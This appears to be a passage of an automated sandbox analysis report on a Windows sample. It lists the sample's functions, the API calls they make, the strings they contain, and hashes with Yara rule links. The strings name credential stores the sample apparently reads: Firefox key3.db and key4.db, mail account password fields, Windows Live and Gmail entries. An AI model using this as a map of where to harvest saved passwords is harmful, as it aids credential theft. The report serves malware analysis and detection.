                                          • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                          • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                          • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404A94, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271
                                          • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                          • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
                                          • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                          • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004093DD, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                          • _mbscpy.MSVCRT ref: 004093F7
                                          • _mbscpy.MSVCRT ref: 00409407
                                          • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                            • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                          • API String ID: 888011440-2039793938
                                          • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                          • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                          • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                          • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409989, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                          • memcpy.MSVCRT ref: 00409A04
                                          • memcpy.MSVCRT ref: 00409A21
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                          • String ID: $$d
                                          • API String ID: 2915808112-2066904009
                                          • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                          • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                          • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                          • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403158, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                          • strchr.MSVCRT ref: 0040326D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileStringstrchr
                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                          • API String ID: 1348940319-1729847305
                                          • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                          • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                          • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                          • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041096F, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                          • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                          • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                          • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F2E4, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                          • memset.MSVCRT ref: 0040F396
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                          • _strnicmp.MSVCRT ref: 0040F3C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                          • String ID: WindowsLive:name=*$windowslive:name=
                                          • API String ID: 945165440-3589380929
                                          • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                          • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                          • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                          • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004036D7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                            • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                          • strchr.MSVCRT ref: 00403711
                                          • _mbscpy.MSVCRT ref: 0040373A
                                          • _mbscpy.MSVCRT ref: 0040374A
                                          • strlen.MSVCRT ref: 0040376A
                                          • sprintf.MSVCRT ref: 0040378E
                                          • _mbscpy.MSVCRT ref: 004037A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                          • String ID: %s@gmail.com
                                          • API String ID: 500647785-4097000612
                                          • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                          • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                          • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                          • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409213, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00409239
                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                          • memset.MSVCRT ref: 0040927D
                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                          • _strcmpi.MSVCRT ref: 004092A2
                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                          • String ID: sysdatetimepick32
                                          • API String ID: 3411445237-4169760276
                                          • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                          • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                          • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                          • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405972, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                          • EndDialog.USER32(?,00000001), ref: 00405A89
                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Item$DialogMessageSend
                                          • String ID:
                                          • API String ID: 2485852401-0
                                          • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                          • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                          • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                          • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B0EB, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                          • DeleteObject.GDI32(?), ref: 0040B202
                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                          • String ID:
                                          • API String ID: 3642520215-0
                                          • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                          • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                          • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                          • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040690E, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 85stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: C@$key3.db$key4.db
                                          • API String ID: 581844971-2841947474
                                          • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                          • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                          • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                          • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B86F, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 0040B88E
                                          • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                          • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                          • EndDeferWindowPos.USER32(?), ref: 0040B941
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClient
                                          • String ID:
                                          • API String ID: 2126104762-0
                                          • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                          • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                          • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                          • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407065, Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemMetrics.USER32(00000011), ref: 00407076
                                          • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                          • GetDC.USER32(00000000), ref: 0040708A
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                          • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                          • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                          • String ID:
                                          • API String ID: 1999381814-0
                                          • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                          • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                          • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                          • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004258DC, Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 438COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                          • API String ID: 1297977491-3883738016
                                          • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                          • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                          • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                          • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D7EA, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen$_memicmp
                                          • String ID: user_pref("
                                          • API String ID: 765841271-2487180061
                                          • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                          • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                          • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                          • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004057FC, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                          • memset.MSVCRT ref: 004058AF
                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                          • SetFocus.USER32(?), ref: 00405965
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                          • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                          • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                          • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A596, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                          • _mbscat.MSVCRT ref: 0040A65B
                                          • sprintf.MSVCRT ref: 0040A67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscatsprintfstrlen
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 1631269929-4153097237
                                          • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                          • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                          • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                          • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409123, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                          • String ID: 0$6
                                          • API String ID: 2300387033-3849865405
                                          • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                          • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                          • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                          • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407446, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpystrlen$memsetsprintf
                                          • String ID: %s (%s)
                                          • API String ID: 3756086014-1363028141
                                          • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                          • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                          • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                          • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443683, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                          • String ID: .8D
                                          • API String ID: 1886237854-2881260426
                                          • Opcode ID: 2fcef2379917d8a12b2531ee488188fbf772f653b84b2ead5df350947d92357f
                                          • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                          • Opcode Fuzzy Hash: 2fcef2379917d8a12b2531ee488188fbf772f653b84b2ead5df350947d92357f
                                          • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00443546, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wcslen.MSVCRT ref: 00443559
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                          • strlen.MSVCRT ref: 004435BE
                                            • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                            • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                          • memcpy.MSVCRT ref: 004435D8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                          • String ID:
                                          • API String ID: 577244452-0
                                          • Opcode ID: 2d6e1bcf4ff3e6172611e80a7a4ba5e9016df722be47fe83c526ca1b4cac1376
